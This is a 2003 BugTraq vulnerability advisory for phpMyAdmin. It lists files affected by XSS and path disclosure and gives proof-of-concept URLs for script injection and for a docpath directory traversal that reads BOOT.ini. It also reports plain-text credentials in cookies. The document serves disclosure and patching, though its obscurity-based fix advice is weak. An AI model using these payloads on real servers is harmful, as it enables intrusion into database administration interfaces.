BugTraq
phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures Jun 18 2003 04:33PM
Lorenzo Manuel Hernandez Garcia-Hierro (security lorenzohgh com)


phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack ,

Information Encoding Weakness and Path Disclosures

--------------------

Product: phpMyAdmin

Vendor: phpMyAdmin Development Team

Versions:

VULNERABLE

- 2.5.2 CVS ( in Development )

- 2.5.x

- 2.4.x

- 2.3.x

- 2.2.x

- 2.1.x

- 2.0.x

- 1.x.x

NOT VULNERABLE

- ?

Advisory: NSRG-15-7

---------------------

Description:

phpMyAdmin is a tool written in PHP intended to handle the administration

of MySQL over the WWW. Currently it can create and drop databases,

create/drop/alter tables, delete/edit/add fields, execute any SQL

statement, manage keys on fields.

-----------------------------------------

SECURITY HOLES FOUND and PROOFS OF CONCEPT:

-----------------------------------------

I encountered Cross Site Scripting Vulnerabilities and Path Disclosures

in some files of the phpMyAdmin

installation , with this files , sending a specially crafted url you can

execute commands in the client

side only and show the local path of the phpMyAdmin installation. The

failures are related to a input validation flaw

and a inproper configuration of php.ini and php configuration declare

library ( declare_php.lib.php )in phpMyAdmin for the errors flags.

I encountered a very dangerous transversal directory attack in a docSQL

import system too.

I discover that phpMyAdmin don't encode the mysql user and password , it

save the data in plain text without encoding !.

-------------------------------

| XSS AND PATH DISCLOSURES |

-------------------------------

The affected files of the XSS attack ( Cross Site Scripting ) and Path

Disclosure are:

- sql.php / sql.php3 - Path Disclosure & XSS-

- pdf_schema.php - Path Disclosure & XSS-

- pdf_pages.php - Path Disclosure & XSS-

- ldi_table.php - Path Disclosure & XSS-

- mult_submits.inc.php - Path Disclosure & XSS-

- chk_rel.php - Path Disclosure -

- db_create.php - Path Disclosure -

- db_datadict.php - Path Disclosure & XSS-

- db_details.php - Path Disclosure -

- db_details_common.php- Path Disclosure -

- db_details_db_info.php - Path Disclosure -

- db_details_export.php - Path Disclosure -

- db_details_structure.php - Path Disclosure -

- db_printview.php - Path Disclosure & XSS-

- db_search.php - Path Disclosure -

- header_printview.inc.php - Path Disclosure -

- ldi_check.php - Path Disclosure -

- read_dump.php - Path Disclosure & XSS-

- tbl_addfield.php - Path Disclosure -

- tbl_alter.php - Path Disclosure -

- tbl_create.php - Path Disclosure -

- tbl_dump.php - Path Disclosure -

- tbl_move_copy.php - Path Disclosure -

- tbl_printview.php - Path Disclosure -

- tbl_properties.inc.php - Path Disclosure -

- tbl_properties.php -Path Disclosure -

- tbl_properties_common.php -Path Disclosure -

- tbl_properties_export.php -Path Disclosure -

- tbl_properties_links.php -Path Disclosure -

- tbl_properties_operations.php -Path Disclosure -

- tbl_properties_options.php -Path Disclosure -

- tbl_properties_table_info.php -Path Disclosure -

- tbl_query_box.php -Path Disclosure -

- tbl_relation.php -Path Disclosure -

- tbl_rename.php -Path Disclosure -

- tbl_replace.php -Path Disclosure -

- tbl_select.php -Path Disclosure -

NOTE: The Path Disclosures occur when you access directly the affected

file without any QUERY_STRING needing a valid session.

The XSS can executed passing crafted query_strings to the php scripts ,

see Samples for more info about this.

VULNERABLE FILES TO PATH DISCLOSURES And XSS THAT DOESN'T NEED A VALID

SESSION :

- libraries/auth/[cookie.auth.lib.php] - Path Disclosure -

- libraries/xpath/[XPath.class.php] - Path Disclosure -

- libraries/[ip_allow_deny.lib.php] - Path Disclosure -

- libraries/[select_lang.lib.php] - Path Disclosure -

- libraries/sqlparser.lib.php - Path Disclosure -

- libraries/db_table_exists.lib.php - Path Disclosure -

-----------------------------------

| DIRECTORY TRANSVERSAL ATTACK & |

| REMOTE LOCAL FILE RETRIEVING & |

| REMOTE INTERNAL DIRECTORY LISTING

-----------------------------------

I found a dangerous transversal directory attack in the file called

db_details_importdocsql.php ( file import

systems ) , i explain this failure in the Proof of Concept:

____Proof of Concept______

You must send a crafted request to the db_details_importdocsql.php file :

http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=[YOUR TRANSVERSAL DIRECTORY ATTACK]

If you want to do a internal directory listing you must do this request:

http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=../../../

With this request you can list the internal directories in the root dir

in a win installation ( normally c:\ ).

Note that you can't request files ( only dirs ) with

db_details_importdocsql.php if you attempt to get a file you get this

message: This was not a Directory .

SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK:

Server iamnottotallysecured.not

Ignoring the file .

Ignoring the file ..

Ignoring the file phf.cgi // ;-)

Ignoring the file dumpenv.pl

Ignoring the file test-cgi // ;-)

Ignoring the file testcgi.pl // ;-D

Ignoring the file wwwboard.pl

Ignoring the file count.cgi

Ignoring the file php.cgi // ;-D

Ignoring the file passwd.pl

Ignoring the file admin.cgi

Ignoring the file ftp.cgi

Ignoring the file formmail.pl // ;-D

Ignoring the file proxy.pl

_______

Samples:

"""""""

Note that this paths are from my personal server in my testing lab:

The target user or you must be logged in for run the attacks :

http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>

http://localhost/mysql/db_datadict.php?db=XSS

http://localhost/mysql/db_details_importdocsql.php?

submit_show=true&do=import&docpath=../../../BOOT.ini

http://localhost/mysql/read_dump.php?

db=nonexistent&sql_query="><h1>XSS</h1>

http://localhost/mysql/tbl_properties_links.php?

table_info_num_rows=10&url_query="><h1>XSS

------------------

| INFORMATION |

| ENCODING |

| WEAKNESS |

------------------

phpMyAdmin doesn't use any encoding type like BASE64/RadiX64 , only saves

the user data ( username and password too ) in plain text without any

encoding.

The authentication token in the cookie is this:

pma_cookie_username=[UserName]; lang=[language]-iso-8859-1;

pma_cookie_password=[your password]

A sample is:

pma_cookie_username=god; lang=en-iso-8859-1;

pma_cookie_password=doesnotexist

-----------------

| SOLUTIONS ;-p |

-----------------

- First: Redefine the errors flags in php.ini to Off. [Path Disclosures]

- Second: Use a partial / secure encoding for athentication tokens like

RadiX64 ( not very secure but an attacker

can think that is a more secure algorithm , obscurity ;-D ) .

- Three: Review the db_details_importdocsql.php file for prevent

transversal directory attacks and remote local directory listing.

-----------

| CONTACT |

-----------

Lorenzo Hernandez Garcia-Hierro

--- Computer Security Analyzer ---

--Nova Projects Professional Coding--

PGP: Keyfingerprint

B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2

ID: 0x9C38E1D7

**********************************

NSRGroup : http://security.novappc.com

are you totally secured ?

______________________

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus